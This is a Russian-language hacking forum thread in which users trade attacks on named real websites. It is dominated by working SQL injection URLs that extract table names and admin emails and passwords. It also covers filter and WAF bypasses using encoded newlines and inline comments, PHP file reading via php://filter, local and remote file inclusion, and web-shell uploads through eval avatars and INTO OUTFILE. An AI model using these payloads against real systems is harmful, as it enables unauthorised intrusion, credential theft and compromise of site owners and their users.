news3'.html - открывает третью, вроде не экранируется.

Есть возможность блинда?

http://yesphun[antigoogle].com/index.php?p=1

Вроде нашел инклуд. Как обрезать расширение? %00 не пашет!

К примеру малоизвестный способ чтения файлов:


http://www.yesphun.com/index.php?p=php://filter/convert.base64-encode/resource=/home/yesphun/domains/yesphun.com/public_html/index




PHP:


YESPHUN.COM - Sabah's 1st Low-Cost Malaysia Web Hosting Services

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");

document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

try {

var pageTracker = _gat._getTracker("UA-12321486-1");

pageTracker._trackPageview();

} catch(err) {}

window.fbAsyncInit = function() {

FB.init({appId: 'your app id', status: true, cookie: true,

xfbml: true});

};

(function() {

var e = document.createElement('script' ); e.async = true;

e.src = document.location.protocol +

'//connect.facebook.net/en_US/all.js';

document.getElementById('fb-root').appendChild(e);

}());

body{

padding:0;

margin:0;

font-family:Arial;

font-size:12px;

color:#000000;

background-color:#8c0007;

}

a:link, a:visited {

color:#000000;

text-decoration:underline;

}

a:active, a:hover {

color:#990000;

text-decoration:none;

}

img{border:0;}





 



 









YESPHUN IT CENTRE (001975944-K)





 



Home

Web Hosting

Domain Name

Services

Promotions

Sign up

Payment Info

FAQs

Contact Us







 

 









 















Manage my billing

Update Payment

Submit a ticket

View/Reply ticket

Event & News

Domain Login



















 

Follow us on..



        

 























 


About us..





YESPHUN.COM i s one of the malaysia low-cost hosting provider since 2008. We do pro vide Domain Registration, Shared Hosting Plan , Reseller Hosting Plan, and Dedicated Serve rs. Besides, we also provided web design, E-Commerce solutions, blog solutions, forum sol utions & etc.



Our promises is to offer you a n affordable hosting and high quality of se rvices. Everyone can get a host.

 











 











Copyright © 2010 YESPHUN IT CENTRE ( 001975944-K). All Right Reserved.

Best view at 1280 x 800 resolution.� �Recommended browser Mozilla Firefox 3.6++ or Google Chrome 5.0++

Terms & Conditions | Acceptable Use Policy | FAQs | Contact Us

 



























Так же, в целях ознакомления советую прочитать эту статью: /thread98525.html

Нашел вот это.

http://uk.generic4all.com/upload_files/product_images/product_image_173_small.png/x.php

Каким образом здесь залить шелл, или это не возможно?

Регайся в ресурсе и загрузи в профиле eval аватарку и так же вызови файл

http://uk.generic4all.com/upload_files/product_images/myevilavatar.png/.php

прочитай еще это http://habrahabr.ru/blogs/sysadm/100961/

Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю.

http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null, null,null+--+

http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,concat(table_schema ,0x2e,TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABL ES#


Что мсжно делать дальше?

.Light. said:
Что мсжно делать дальше?




HTML:
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_ NAME)%20FROM%20INFORMATION_SCHEMA.TABLES

d1v said:

HTML:
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_ NAME)%20FROM%20INFORMATION_SCHEMA.TABLES



Как можно залить шелл??Или выдернуть пасс админа?

.Light. said:
Как можно залить шелл??Или выдернуть пасс админа?


а ты статейки почитай милок...не все же за тебя делать надо.

Gorev said:
а ты статейки почитай милок...не все же за тебя делать надо.


До меня быстрей доходит на примерах.

er9j6@ said:
Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю.
http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null, null,null+--+



Если честно - я не увидел тут скулю.

>До меня быстрей доходит на примерах.


http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(login, 0x3a,password)%20FROM%20jb_admin



И мне помогите со скульей:


PHP:
http://cdo.kz/ru/default/index/search?q={SQL-CODE}

Kuteke said:
>До меня быстрей доходит на примерах.
И мне помогите со скульей:

PHP:
http://cdo.kz/ru/default/index/search?q={SQL-CODE}



по-моему, скули нету...

Через sql запрос шелл не заливается, пишет error 13

>по-моему, скули нету...

Двойные кавычки ставь!

Kuteke said:
>по-моему, скули нету...
Двойные кавычки ставь!


странный ты какой-то.. тебе уже раз 20 объясняли что наличие ошибки не говорит о наличии скули, что не вывод инфы не говорит о наличии скули, тебе сказали как узнать на 100% о наличии скули, ты даже сказал что прочитал все маны и всё понял.

странный ты какой-то...

Подскажите возможно ли залить шелл на Aardvark Topsites PHP 5.2

имея доступ к админке?

http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,concat(table_schema ,0x2e,TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABL ES#


Помогите залить шелл!!Уже все перепробывал!!

.Light. said:
Помогите залить шелл!!Уже все перепробывал!!


тебе дали запрос с пассом админа и его логином..что тебе еще дать? сразу за тебя залить шелл? ты еще попробуй и потребуй что бы за тебя шелл залили !

Gorev said:
тебе дали запрос с пассом админа и его логином..что тебе еще дать? сразу за тебя залить шелл? ты еще попробуй и потребуй что бы за тебя шелл залили !


Я тебя лично прошу???НЕТ!!!Так что иди варуй!

.Light. said:
Я тебя лично прошу???НЕТ!!!Так что иди варуй!


малыш..иди делай уроки..еще недорос такими словами говорить.если ты недоумок не поня; до сих пор для чего раздел вопросы по уявимостям то это не моя вина..просишь залить шелл? здуй в раздел по просьбам. пост можно удалить после прочтения онного троллем что отписался выше.

Запрос отвергнут


http://www.sait.ru/comment.php?idart=11364+union+select+1,2,table_nam e,4,5,6+from+information_schema.tables--



при вводе последнего в запрос

"+from+information_schema.tables--"

выкидывает на хостинг типа небезопасный запрос, как с этим бороться?

OxoTnik said:
при вводе последнего в запрос
"+from+information_schema.tables--"
выкидывает на хостинг типа небезопасный запрос, как с этим бороться?


разбей запрос на 2 строки c помощью %0A

http://www.site.ru/comment.php?idart=-11364+union+%0A+select+1,2,table_name,4,5,6+from+i nformation_schema.tables--

d1v said:
разбей запрос на 2 строки c помощью %0A
http://www.site.ru/comment.php?idart=-11364+union+%0A+select+1,2,table_name,4,5,6+from+i nformation_schema.tables--



Примного благодарен!!!

только мне не понятно: %0A какую функцию делает или вообще что это?

OxoTnik said:
Примного благодарен!!!
только мне не понятно: %0A какую функцию делает или вообще что это?


это enter

на свебе блочится конструкция union select from, чтобы обойти фильтр разбиваем запрос на несколько строк.

OxoTnik said:
Ужасы рассказал, примного благодарен))


Помимо самого пробела есть еще несколько пробельных символов, которые MySQL воспринимает как пробел, это:

%09 – табуляция

%0A – символ новой строка

%0D – возврат каретки

%0B – вертикальная табуляция

%0C – символ новой страницы

Какой нибудь из этих символов может да и пропустит фильтр. Пример:

http://xxx/news.php?id=1'%09UNION%09SELECT%091,2,3,4,5,6%09FR OM%09Users%0 9WHERE%09login='admin'#

er9j6@ said:
Помимо самого пробела есть еще несколько пробельных символов, которые MySQL воспринимает как пробел, это:
%09 – табуляция
%0A – символ новой строка
%0D – возврат каретки
%0B – вертикальная табуляция
%0C – символ новой страницы
Какой нибудь из этих символов может да и пропустит фильтр. Пример:
http://xxx/news.php?id=1'%09UNION%09SELECT%091,2,3,4,5,6%09FR OM%09Users%0 9WHERE%09login='admin'#


блочится конструкция union select from, находящаяся на одной строке, т.е. поможет только символ переноса строки.

sait/comment.php?idart=-11364+union+%0A+select+1,2,table_name,4,5,6+from+i nformation_schema.tables--


этот запрос вывел мой таблички на ура

и есть таблицаusers как его вывести? а потом с него логин и пасс, может кто нибудь чуток обьяснить?

хостинг свеб!

OxoTnik said:
этот запрос вывел мой таблички на ура
и есть таблица
users
как его вывести? а потом с него логин и пасс, может кто нибудь чуток обьяснить?
хостинг свеб!


/thread43966-sql+faq.html

OxoTnik said:
там рассказываеться как вытащить с помощью лимита, только у меня вообще так не прокатывает...


читай всё! кури, пробуй.

пункт 4.2 прочитай особеннно внимательно.

подскажите запрос к mssql, чтобы вывести определенные столбцы в отдельный текстовик

CVE-2009-2629

Есть эксплойт? Поделитесь!

Ulitko said:
подскажите запрос к mssql, чтобы вывести определенные столбцы в отдельный текстовик


exec master..sp_makewebtask "путь_до_файла",

"select имя_столбца from имя_таблицы"

попробывал этот запрос. Выдает ошибку

(Could not find stored procedure 'master..sp_makewebtask'.)

запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+

в ответ ошибка supplied argument is not a valid MySQL result resource in

Подскажите где она?

OxoTnik said:
Возможен такой вариант, что просто отказывает в выводе таблиц?
мой запрос выглядел по моему правильно
Ошибка
Unknown column 'users' in 'where clause'


users захекси..

users хексни!

0x7573657273

http://steelmuscle.org/hex.php

wkar said:
запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+
в ответ ошибка supplied argument is not a valid MySQL result resource in
Подскажите где она?


во первых получишь ошибку

Unknown column '' in 'field list' (указывать надо в прямых ковычках)

во вторых путь к файлу (После into outfile) надо указать в ковычках а не в ( `` )

в третих нельзя захексить путь

Ulitko said:
попробывал этот запрос. Выдает ошибку
(Could not find stored procedure 'master..sp_makewebtask'.)


забыл добавить, пытаюсь сделать все из под шелла

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273--


это шутка????from+0x7573657273

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws(0x3a,email,pa ssword),4,5,6+fr om+users+--+

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,column_name,4,5,6+fr om+information_schema.columns+where+table_name=0x7 573657273+--+

как то так что бы тебе понятнее было что ты пытаешься сделать

OxoTnik said:
В моем запросе мне уже должен показаться логин и пароль, в твоем он показывает мне колонки которые я уже знаю


http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273-- в этом?????????

в этом запросе он теб не покажет ни какие имайлы и пароли, чуть выше я тебе показал более менее рабочий запрос

OxoTnik said:
Ошибся, он вывел мне логин пасс,спасибо"
только не совсем понятно что делает
concat_ws(0x3a,email,password)
спс все обьяснили
выражаю благодарность
HAXTA4OK


concat_ws() выводит в одном выводимом поле несколько значений которые определяются первыми символами до запятой, а все после запросы будут выводиться разделяясь первыми символами.

OxoTnik said:
Ситуация
Я вошел в базу данных и с этим нет проблем, но мне известно что там ещё есть ещё 1 база данных, как там прогуляться, и что для этого нужно сделать?


узнать ее имя, и составлять запросы типа:

SELECT column from database2.table

OxoTnik said:
Ситуация
Я вошел в базу данных и с этим нет проблем, но мне известно что там ещё есть ещё 1 база данных, как там прогуляться, и что для этого нужно сделать?


нет там больше баз.

http://www.chelsi.ru/comment.php?idart=-11364+union+%0A+select+1,2,schema_name,4,5,6+from+ information_schema.schemata

чел, ответы на ВСЕ свои вопросы, заданные в этой теме ты легко можешь найти в поиске или в манах, например в том, ссылку на который я запостил выше. а разжевать всё и положить в ротик, означает создать новый поток тупых вопросов.

Привет!

Проблема вот в чём, на сервере наверно сайт фильтр. Когда делаю запрос - http://www.adlucem.info/?sadala=-15+union+select+1,2,3,4,5,6,7,8,9--

появляется Not Acceptable 406 и так на всех сайтах на серверы где есть ошибка. Как можно это обойти?

Спасибо за внимание!

http://www.adlucem.info/?sadala=-15+union+/*!select*/+1,2,3,4,5,6,7,8,9--+

Bmen said:
Привет!
Проблема вот в чём, на сервере наверно сайт фильтр. Когда делаю запрос - http://www.adlucem.info/?sadala=-15+union+select+1,2,3,4,5,6,7,8,9--
появляется Not Acceptable 406 и так на всех сайтах на серверы где есть ошибка. Как можно это обойти?
Спасибо за внимание!


http://www.adlucem.info/?sadala=-15+/*!union*/+select+1,2,3,4,5,6,7,8,version()--+

Всем доброго дня. Можно ли как-то использовать

http://www.kid.ru/forum/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st='

? Бился я долго, но проблема в LIMIT после ORDER BY.

Привет. Пытаюсь приинклудить файл:

http://www.vergaviagrande.it/iframe.php?file=http://serpov-alex.narod2.ru/1.txt

В нем такое содержимое:

Но в результате содержимое файла тупо выводиться на экран. Я так понимаю что ничего не получиться. Но если сделать так:

http://www.vergaviagrande.it/iframe.php?file=qwe

То выведутся ошибки, точно такие, какие наводят во всех статьях про пхп-инклуды.

Собственно вопрос: что я не так делаю?

=Zeus= said:
Привет. Пытаюсь приинклудить файл:
http://www.vergaviagrande.it/iframe.php?file=http://serpov-alex.narod2.ru/1.txt
В нем такое содержимое:
Но в результате содержимое файла тупо выводиться на экран. Я так понимаю что ничего не получиться. Но если сделать так:
http://www.vergaviagrande.it/iframe.php?file=qwe
То выведутся ошибки, точно такие, какие наводят во всех статьях про пхп-инклуды.
Собственно вопрос: что я не так делаю?


имя скрипта должно тебе подсказывать что там не инклуд, файлы открываются в фрейме

Konqi said:
имя скрипта должно тебе подсказывать что там не инклуд, файлы открываются в фрейме


* Facepalm *

Спасибо ))

=Zeus=

инклуд тоже есть, но локальный

просто скрипт хуего написано, заблуждает

логика такая, если в имени файла есть http:// то файл открывается в фрейме, если имя файла локальное, то инклудится

(во всяком случий я так понял)